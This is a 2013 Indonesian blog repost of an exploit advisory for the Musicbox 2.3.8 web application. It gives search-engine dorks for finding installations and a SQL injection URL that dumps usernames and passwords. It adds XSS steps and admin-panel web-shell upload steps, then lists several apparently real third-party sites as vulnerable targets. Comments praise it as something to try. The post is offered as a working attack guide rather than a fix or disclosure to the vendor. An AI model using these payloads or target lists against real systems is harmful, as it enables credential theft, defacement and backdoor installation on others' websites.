Senin, 09 September 2013
Home » exploit » Musicbox 2.3.8 Multiple Vulnerabilities
02.26
3 komentar

Musicbox 2.3.8 Multiple Vulnerabilities

#Forum                  : Newbie-Security Forum - Nothing Security Is Perfect
#Exploit Title                      : Musicbox 2.3.8 Multiple Vulnerabilities
#Author                               : DevilScreaM
#Date                    : 25/08/2013
#Category                           : Web Applications
#Vendor                 : http://www.musicboxv2.com/
#Version                              : 1.0 - 2.3.8

#Dork  
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008
inurl:genre_albums.php?id=

#Vulnerability    : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
#Tested On                        : Windows 7 32 Bit (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id


SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go To Fiture Search

2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search

3. See Result

or See with URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0


========================================================================================

*News Profile

1. Register To Website or go to link http://site-target/register.php

2. Login to Website

3. Go to Menu [ My News ]

4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>

And at Detials input your XSS or Text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://kankoa.com/musicbox/member.php?uname=devilscream


==========================================================================================

Shell Upload Vulnerability

*Artist Galery

1. Go to Admin Page, And Login

2. Go to Upload Artist Image or Go to Link

http://site-target/admin/adminpanel.php?action=artistgallery

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At

http://site-target/artist_gallery/Your_Backdoor.php


============================================================================================

*Album Galery

1. Go to Admin Page, And Login

2. Go to Upload Album Image or Go to Link

http://site-target/admin/adminpanel.php?action=albumgallery

3. Select Option, Example Option "All Album", And Click Submit

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At

http://site-target/album_gallery/Your_Backdoor.php


==========================================================================================

Example Site Vuln SQL Injection

http://azadar.in/genre_albums.php?id=3'
http://kankoa.com/musicbox/genre_albums.php?id=3'
http://mp3hungama.com/music/genre_albums.php?id=3'
http://hraminfo.ru/music/genre_albums.php?id=3'
http://tamilmaalai.com/genre_albums.php?id=2'

Diposting oleh di 02.26
Label:
Share:

3 komentar:

  1. selo9 September 2013 pukul 05.21

    Wahhh bagus nih, makasih atas infonya :D

    BalasHapus
  2. Anonim9 September 2013 pukul 05.44

    wew mantab nice!!
    salam dari STAR-US

    BalasHapus
  3. Anonim15 September 2013 pukul 04.34

    Wajib dicoba sebagai bahan koleksi nih

    BalasHapus

Langganan: Posting Komentar (Atom)